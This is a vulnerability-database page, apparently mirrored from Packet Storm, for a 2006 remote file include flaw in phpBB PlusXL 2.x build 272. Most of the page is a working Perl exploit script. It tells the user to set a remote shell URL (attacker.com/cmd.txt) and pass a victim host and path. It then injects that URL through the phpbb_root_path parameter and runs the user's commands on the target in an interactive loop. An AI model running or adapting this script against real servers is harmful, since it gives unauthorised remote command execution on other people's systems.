Lucene search

K

phpbbplusxl-rfi.txt

🗓️ 18 Oct 2006 00:00:00Reported by nima salehiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 29 Views

phpBB PlusXL 2.X build 272 has a high severity remote file include vulnerability.

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`#!/usr/bin/perl  
  
#####################################################################################################  
# #  
# phpBB PlusXL 2.X biuld 272 #  
# #  
# Class: Remote File Include Vulnerability #  
# #  
# Patch: unavailable #  
# #  
# Date: 2006/10/12 #  
# #  
# Remote: Yes #  
# #  
# Type: high #  
# #  
# Site: http://www.xs4all.nl/~hkicken/plusxl.htm #  
# #  
#####################################################################################################  
  
  
use IO::Socket;  
use LWP::Simple;  
  
$cmdshell="http://attacker.com/cmd.txt"; # <====== Change This Line With Your Personal Script  
  
print "\n";  
print "##########################################################################\n";  
print "# #\n";  
print "# phpBB PlusXL 2.x <= biuld 272 Remote File Include Vulnerability #\n";  
print "# Bug found By : Ashiyane Corporation #\n";  
print "# Email: nima salehi nima[at]ashiyane.ir #\n";  
print "# Web Site : www.Ashiyane.ir #\n";  
print "# #\n";  
print "##########################################################################\n";  
  
  
if (@ARGV < 2)  
{  
print "\n Usage: Ashiyane.pl [host] [path] ";  
print "\n EX : Ashiyane.pl www.victim.com /plusxl20/ \n\n";  
exit;  
}  
  
  
$host=$ARGV[0];  
$path=$ARGV[1];  
$vul="mods/iai/includes/constants.php?phpbb_root_path="  
  
print "Type Your Commands ( uname -a )\n";  
print "For Exiit Type END\n";  
  
print "<Shell> ";$cmd = <STDIN>;  
  
while($cmd !~ "END") {  
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n";  
  
print $socket "GET ".$path.$vul.$cmdshell."?cmd=".$cmd."? HTTP/1.1\r\n";  
print $socket "Host: ".$host."\r\n";  
print $socket "Accept: */*\r\n";  
print $socket "Connection: close\r\n\n";  
  
while ($raspuns = <$socket>)  
{  
print $raspuns;  
}  
  
print "<Shell> ";  
$cmd = <STDIN>;  
}  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
18 Oct 2006 00:00Current
7.4High risk
Vulners AI Score7.4
29
.json
Report